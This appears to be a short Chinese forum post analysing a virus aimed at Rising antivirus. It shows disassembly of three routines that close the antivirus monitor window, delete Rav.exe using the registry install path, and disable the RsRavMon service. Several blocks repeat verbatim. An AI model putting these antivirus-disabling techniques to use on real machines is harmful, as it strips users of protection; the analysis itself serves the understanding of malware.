(-_-!)对付瑞星的病毒
1
00401890 /$ 68 C8724000 push 004072C8 ; /Title = "监控中心"
00401895 |. 6A 00 push 0 ; |Class = 0
00401897 |. FF15 50614000 call dword ptr ds:[<&USER32.FindWindo>; \FindWindowA
0040189D |. 85C0 test eax, eax
0040189F |. 75 01 jnz short 004018A2
004018A1 |. C3 ret
004018A2 |> 6A 04 push 4 ; /Relation = GW_OWNER
004018A4 |. 50 push eax ; |hWnd
004018A5 |. FF15 54614000 call dword ptr ds:[<&USER32.GetWindow>; \GetWindow
004018AB |. 85C0 test eax, eax
004018AD |. 75 01 jnz short 004018B0
004018AF |. C3 ret
004018B0 |> 6A 00 push 0 ; /lParam = 0
004018B2 |. 68 5B9C0000 push 9C5B ; |wParam = 9C5B
004018B7 |. 68 11010000 push 111 ; |Message = WM_COMMAND
004018BC |. 50 push eax ; |hWnd
004018BD |. FF15 58614000 call dword ptr ds:[<&USER32.PostMessa>; \PostMessageA
004018C3 |. B8 01000000 mov eax, 1
004018C8 \. C3 ret
00401895 |. 6A 00 push 0 ; |Class = 0
00401897 |. FF15 50614000 call dword ptr ds:[<&USER32.FindWindo>; \FindWindowA
0040189D |. 85C0 test eax, eax
0040189F |. 75 01 jnz short 004018A2
004018A1 |. C3 ret
004018A2 |> 6A 04 push 4 ; /Relation = GW_OWNER
004018A4 |. 50 push eax ; |hWnd
004018A5 |. FF15 54614000 call dword ptr ds:[<&USER32.GetWindow>; \GetWindow
004018AB |. 85C0 test eax, eax
004018AD |. 75 01 jnz short 004018B0
004018AF |. C3 ret
004018B0 |> 6A 00 push 0 ; /lParam = 0
004018B2 |. 68 5B9C0000 push 9C5B ; |wParam = 9C5B
004018B7 |. 68 11010000 push 111 ; |Message = WM_COMMAND
004018BC |. 50 push eax ; |hWnd
004018BD |. FF15 58614000 call dword ptr ds:[<&USER32.PostMessa>; \PostMessageA
004018C3 |. B8 01000000 mov eax, 1
004018C8 \. C3 ret
2
004010A7 |. 50 push eax ; /pHandle
004010A8 |. 6A 01 push 1 ; |Access = KEY_QUERY_VALUE
004010AA |. 6A 00 push 0 ; |Reserved = 0
004010AC |. 68 7C704000 push 0040707C ; |Subkey = "SOFTWARE\rising\Rav"
004010B1 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004010B6 |. FF15 14604000 call dword ptr ds:[<&ADVAPI32.Re>; \RegOpenKeyExA
004010BC |. 85C0 test eax, eax
004010BE |. 75 4C jnz short 0040110C
004010C0 |. 8D4C24 04 lea ecx, dword ptr ss:[esp+4]
004010C4 |. 8D5424 08 lea edx, dword ptr ss:[esp+8]
004010C8 |. 51 push ecx ; /pBufSize
004010C9 |. 52 push edx ; |Buffer
004010CA |. 50 push eax ; |pValueType
004010CB |. 50 push eax ; |Reserved
004010CC |. 8B4424 10 mov eax, dword ptr ss:[esp+10] ; |
004010D0 |. 68 70704000 push 00407070 ; |ValueName = "installpath"
004010D5 |. 50 push eax ; |hKey
004010D6 |. C74424 1C 640>mov dword ptr ss:[esp+1C], 64 ; |
004010DE |. FF15 18604000 call dword ptr ds:[<&ADVAPI32.Re>; \RegQueryValueExA
004010E4 |. 8D4C24 08 lea ecx, dword ptr ss:[esp+8]
004010E8 |. 68 64704000 push 00407064 ; ASCII "\Rav.exe"
004010ED |. 51 push ecx
004010EE |. E8 5D100000 call 00402150
004010F3 |. 83C4 08 add esp, 8
004010F6 |. 8D5424 08 lea edx, dword ptr ss:[esp+8]
004010FA |. 52 push edx ; /FileName
004010FB |. FF15 A8604000 call dword ptr ds:[<&KERNEL32.De>; \DeleteFileA
004010A8 |. 6A 01 push 1 ; |Access = KEY_QUERY_VALUE
004010AA |. 6A 00 push 0 ; |Reserved = 0
004010AC |. 68 7C704000 push 0040707C ; |Subkey = "SOFTWARE\rising\Rav"
004010B1 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004010B6 |. FF15 14604000 call dword ptr ds:[<&ADVAPI32.Re>; \RegOpenKeyExA
004010BC |. 85C0 test eax, eax
004010BE |. 75 4C jnz short 0040110C
004010C0 |. 8D4C24 04 lea ecx, dword ptr ss:[esp+4]
004010C4 |. 8D5424 08 lea edx, dword ptr ss:[esp+8]
004010C8 |. 51 push ecx ; /pBufSize
004010C9 |. 52 push edx ; |Buffer
004010CA |. 50 push eax ; |pValueType
004010CB |. 50 push eax ; |Reserved
004010CC |. 8B4424 10 mov eax, dword ptr ss:[esp+10] ; |
004010D0 |. 68 70704000 push 00407070 ; |ValueName = "installpath"
004010D5 |. 50 push eax ; |hKey
004010D6 |. C74424 1C 640>mov dword ptr ss:[esp+1C], 64 ; |
004010DE |. FF15 18604000 call dword ptr ds:[<&ADVAPI32.Re>; \RegQueryValueExA
004010E4 |. 8D4C24 08 lea ecx, dword ptr ss:[esp+8]
004010E8 |. 68 64704000 push 00407064 ; ASCII "\Rav.exe"
004010ED |. 51 push ecx
004010EE |. E8 5D100000 call 00402150
004010F3 |. 83C4 08 add esp, 8
004010F6 |. 8D5424 08 lea edx, dword ptr ss:[esp+8]
004010FA |. 52 push edx ; /FileName
004010FB |. FF15 A8604000 call dword ptr ds:[<&KERNEL32.De>; \DeleteFileA
3
00401302 |. 68 04724000 push 00407204 ; ASCII "RsRavMon"
00401307 |. 57 push edi
00401308 |. FF15 04604000 call dword ptr ds:[<&AD>; ADVAPI32.OpenServiceA
0040130E |. 8BF0 mov esi, eax
00401310 |. 85F6 test esi, esi
00401312 |. 75 0C jnz short 00401320
00401314 |. 57 push edi
00401315 |. FF15 08604000 call dword ptr ds:[<&AD>; ADVAPI32.CloseServiceHandle
0040131B |. 5F pop edi
0040131C |. 33C0 xor eax, eax
0040131E |. 5E pop esi
0040131F |. C3 ret
00401320 |> 6A 00 push 0 ; /DisplayName = NULL
00401322 |. 6A 00 push 0 ; |Password = NULL
00401324 |. 6A 00 push 0 ; |ServiceStartName = NULL
00401326 |. 6A 00 push 0 ; |pDependencies = NULL
00401328 |. 6A 00 push 0 ; |pTagId = NULL
0040132A |. 6A 00 push 0 ; |LoadOrderGroup = NULL
0040132C |. 6A 00 push 0 ; |BinaryPathName = NULL
0040132E |. 6A FF push -1 ; |ErrorControl = SERVICE_NO_CHANGE
00401330 |. 6A 04 push 4 ; |StartType = SERVICE_DISABLED
00401332 |. 6A FF push -1 ; |ServiceType =
00401307 |. 57 push edi
00401308 |. FF15 04604000 call dword ptr ds:[<&AD>; ADVAPI32.OpenServiceA
0040130E |. 8BF0 mov esi, eax
00401310 |. 85F6 test esi, esi
00401312 |. 75 0C jnz short 00401320
00401314 |. 57 push edi
00401315 |. FF15 08604000 call dword ptr ds:[<&AD>; ADVAPI32.CloseServiceHandle
0040131B |. 5F pop edi
0040131C |. 33C0 xor eax, eax
0040131E |. 5E pop esi
0040131F |. C3 ret
00401320 |> 6A 00 push 0 ; /DisplayName = NULL
00401322 |. 6A 00 push 0 ; |Password = NULL
00401324 |. 6A 00 push 0 ; |ServiceStartName = NULL
00401326 |. 6A 00 push 0 ; |pDependencies = NULL
00401328 |. 6A 00 push 0 ; |pTagId = NULL
0040132A |. 6A 00 push 0 ; |LoadOrderGroup = NULL
0040132C |. 6A 00 push 0 ; |BinaryPathName = NULL
0040132E |. 6A FF push -1 ; |ErrorControl = SERVICE_NO_CHANGE
00401330 |. 6A 04 push 4 ; |StartType = SERVICE_DISABLED
00401332 |. 6A FF push -1 ; |ServiceType =
SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_ADAPTER|SERVICE_RECOGNIZER_DRIVER|SERVIC
E_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS|FFFFFEC0
00401334 |. 56 push esi ; |hService
00401335 |. FF15 0C604000 call dword ptr ds:[<&AD>; \ChangeServiceConfigA
0040133B |. 57 push edi
0040133C |. 8B3D 08604000 mov edi, dword ptr ds:>; ADVAPI32.CloseServiceHandle
00401342 |. FFD7 call edi ; <&ADVAPI32.CloseServiceHandle>
00401334 |. 56 push esi ; |hService
00401335 |. FF15 0C604000 call dword ptr ds:[<&AD>; \ChangeServiceConfigA
0040133B |. 57 push edi
0040133C |. 8B3D 08604000 mov edi, dword ptr ds:>; ADVAPI32.CloseServiceHandle
00401342 |. FFD7 call edi ; <&ADVAPI32.CloseServiceHandle>
哈哈``找窗口、注册表搜索路径、修改服务启动类型都用上了```
真的是树大招风